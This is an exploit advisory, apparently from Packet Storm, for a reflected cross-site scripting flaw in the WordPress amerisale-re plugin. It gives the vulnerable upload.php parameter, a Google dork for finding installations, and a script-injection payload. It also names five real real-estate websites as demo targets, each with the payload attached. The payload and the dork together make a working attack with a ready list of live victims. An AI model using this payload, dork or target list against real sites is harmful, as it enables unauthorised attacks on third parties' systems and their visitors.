WordPress Amerisale-Re third party plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
dd9af24538474b4be70e9304d308e609bd382701c86aaeaaa6dd00cff815eadd#********************************************************************
# Exploit Title : Wordpress amerisale-re plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl :wp-content/plugins/amerisale-re
#
# Date: 2013-11-26
#
# Tested on: Windows 7 , Linux
#######################
# Exploit : Cross site scripting
#
# Location :
[Target]wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=[xss]
#
# Script For Test : "/><script>alert(1);</script>
######################
# Demo:
#
#
http://bexleyproperties.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://c21lynch.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://garrybrownrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://lexingtontexasrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://pudowensrealty.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed